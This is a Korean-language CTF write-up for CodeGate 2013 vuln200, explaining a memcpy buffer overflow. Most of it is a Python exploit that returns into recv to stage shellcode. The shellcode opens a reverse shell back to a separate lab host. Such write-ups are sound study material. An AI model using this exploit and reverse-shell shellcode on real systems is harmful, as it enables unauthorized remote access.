[CodeGate 2013] vuln200 풀이

[CodeGate 2013] vuln200 풀이

여기 보면 처음에 메뉴에서 buf에 400바이트 입력받을수 있다.

sub_8048eeb 함수에 첫번재 인자로 buf를 넘겨주고 2번재는 fd , 3번째는 buf에 입력한 길이를 넘겨준다.

sub_8048eeb함수를 보면 memcpy에서 버퍼오버플로우 취약점이 터지게 된다.

우선 저기로 갈려면 메뉴에서 write을 입력해줘야된다.

 write + 페이로드 이런식으로 하면 되는데 

저기 memcpy 보면 아까 입력한 버퍼값 +5부터 dest로 복사된다.

즉 write가 5글자니 그뒤 페이로드부터 복사된다는 뜻.!

이제 간단히 bind shellcode로 하던지 rtl로 하던지 하면 된다.

from socket import *

from struct import *

from telnetlib import *

import time

p = lambda x : pack("<L",x)

up = lambda x : unpack("<L",x)[0]

def read_until(s,readle):

    tmp = ''

    while 1:

        tmp = s.recv(4096)

        if tmp.find(readle) != -1:

            return tmp

    return ''

s = create_connection(("10.211.55.4",7777))

bss = 0x0804b0a0

recv_plt = 0x08048780

shellcode = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x66\xb3\x01\x51\x6a\x06\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0\x66\x31\xdb\xb3\x02\x68\x0a\xd3\x37\x02\x66\x68\x04\xD2\x66\x53\xfe\xc3\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\x31\xc9\xb1\x03\xfe\xc9\xb0\x3f\xcd\x80\x75\xf8\x31\xc0\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xb0\x0b\xcd\x80"

print s.recv(1024)

payload = ""

payload += "write"+"a"*240

payload += p(recv_plt)

payload += p(bss)

payload += p(4)

payload += p(bss)

payload += p(len(shellcode)+1)

payload += p(0)

s.send(payload)

print read_until(s,"main")

time.sleep(1)

s.send(shellcode)